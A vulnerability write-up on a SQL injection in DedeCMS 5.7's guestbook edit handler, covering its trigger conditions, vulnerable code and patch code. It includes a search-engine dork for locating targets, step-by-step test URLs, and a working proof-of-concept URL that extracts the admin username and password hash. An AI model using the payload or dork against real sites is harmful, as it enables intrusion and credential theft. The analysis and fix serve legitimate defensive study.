dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php


Contents

1. Vulnerability description
2. Trigger conditions
3. Scope of impact
4. Code analysis
5. Defense
6. Offense and defense considerations


1. Vulnerability description

The injection succeeds only when the following conditions are met:

1. PHP magic_quotes_gpc=off
2. The vulnerable file exists: plus/guestbook.php
3. The table dede_guestbook also exists in the database

Relevant Link:

inurl:/plus/guestbook.php


2. Vulnerability trigger conditions

1. Open http://localhost/dedecms5.7/plus/guestbook.php
2. Under [Reply/Edit] the ID of a visitor's message is visible. Note that ID, for example: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&id=1
3. Visit: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=1
4. After submitting, DedeCMS 5.7 shows "成功更改或回複一條留言" (a message was successfully changed or replied to), which proves the edit went through.
5. Go back to http://localhost/dedecms5.7/plus/guestbook.php and check whether that message's content has become errs.cc'. If it has, the vulnerability can no longer be exploited, because the server does not meet the magic_quotes_gpc=off condition.
6. If the edit did not succeed and the message with that ID still has its old content, the vulnerability is exploitable.
7. Then visit: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&id=1&msg=',msg=user(),email='
8. Go back: the content of that message has been replaced with the result of MySQL's user().

Relevant Link: 

http://www.51php.com/dedecms/16942.html
http://www.wooyun.org/bugs/wooyun-2012-014501


3. Vulnerability impact scope

0x1: POC

/plus/guestbook.php?action=admin&job=editok&id=146&msg=',[email protected]`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='

Relevant Link:

http://www.programgo.com/article/45492569994/
http://www.cnblogs.com/Hkadmin/p/3712667.html


4. Vulnerability code analysis

/plus/guestbook.php

//edit a message
if($action=='admin')
{
    include_once(dirname(__FILE__).'/guestbook/edit.inc.php');
    exit();
}

\plus\guestbook\edit.inc.php

//$g_isadmin is never checked here; the user-supplied action = "admin" is trusted by mistake
else if($job=='editok')
{
    $remsg = trim($remsg);
    //$msg is not filtered here, so arbitrary SQL can be injected
    $dsql->ExecuteNoneQuery("update `#@__guestbook` set `msg`='$msg', `posttime`='".time()."' where id='$id' ");
    ShowMsg("成功更改或回複一條留言!",$GUEST_BOOK_POS);
    exit();
}

Relevant Link:

http://pannisec.diandian.com/?tag=SQL%E6%B3%A8%E5%B0%84


5. Defense method

\plus\guestbook\edit.inc.php

else if($job=='editok')
{
    $remsg = trim($remsg);
    /* verify $g_isadmin */
    if($remsg!='')
    {
        //admin replies are not HTML-filtered
        if($g_isadmin)
        {
            $msg = "<div class=\\'rebox\\'>".$msg."</div>\n".$remsg;
            //$remsg <br><font color=red>Admin reply:</font>
        }
        else
        {
            $row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");
            $oldmsg = "<div class=\\'rebox\\'>".addslashes($row['msg'])."</div>\n";
            $remsg = trimMsg(cn_substrR($remsg, 1024), 1);
            $msg = $oldmsg.$remsg;
        }
    }
    /* */
    /* filter $msg properly */
    $msg = addslashes($msg);
    /* */
    $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");
    ShowMsg("成功更改或回複一條留言!", $GUEST_BOOK_POS);
    exit();
}
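The patch above still builds the UPDATE by string concatenation and still interpolates $id unescaped, so it relies on addslashes being applied everywhere. The function below is an added example (not DedeCMS's code) of the same `editok` branch written so that the request parameters cannot reach the SQL text at all: the caller's privilege comes only from $g_isadmin, the id is validated as an integer, and every value is a bound parameter. It assumes a mysqli connection `$db`, a literal table name `dede_guestbook` in place of the `#@__` prefix, and uses mb_substr/htmlspecialchars where DedeCMS calls cn_substrR/trimMsg.

```php
<?php
// Added example, not DedeCMS's own code. Assumes a mysqli connection $db and
// the table `dede_guestbook`; the DedeCMS $dsql wrapper is not used here.
function guestbook_editok(mysqli $db, bool $g_isadmin, $id, string $msg, string $remsg): bool
{
    // The original interpolates $id; here it must be a plain integer.
    if (!ctype_digit((string) $id)) {
        return false;
    }
    $id = (int) $id;
    $remsg = trim($remsg);

    if ($g_isadmin) {
        // Administrator (session-derived flag, never the request's action/job):
        // may rewrite the message and attach an unfiltered reply.
        if ($remsg !== '') {
            $msg = "<div class='rebox'>" . $msg . "</div>\n" . $remsg;
        }
    } else {
        // Visitor: may only append a length-limited, HTML-escaped reply to the
        // stored message; $msg from the request is ignored entirely.
        if ($remsg === '') {
            return false;
        }
        $sel = $db->prepare('SELECT `msg` FROM `dede_guestbook` WHERE `id` = ?');
        $sel->bind_param('i', $id);
        $sel->execute();
        $sel->bind_result($oldmsg);
        if (!$sel->fetch()) {
            $sel->close();
            return false; // no such message
        }
        $sel->close();
        $reply = htmlspecialchars(mb_substr($remsg, 0, 1024), ENT_QUOTES, 'UTF-8');
        $msg = "<div class='rebox'>" . $oldmsg . "</div>\n" . $reply;
    }

    // Bound parameters: a value such as  ',msg=user(),email='  is stored verbatim
    // as message text and cannot alter the UPDATE statement.
    $upd = $db->prepare('UPDATE `dede_guestbook` SET `msg` = ?, `posttime` = ? WHERE `id` = ?');
    $now = time();
    $upd->bind_param('sii', $msg, $now, $id);
    $ok = $upd->execute();
    $upd->close();
    return $ok;
}
```

With bound parameters the magic_quotes_gpc setting no longer matters for this statement, which removes condition 1 from the preconditions listed in section 1.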


6. Offense and defense considerations

Copyright (c) 2015 LittleHann All rights reserved
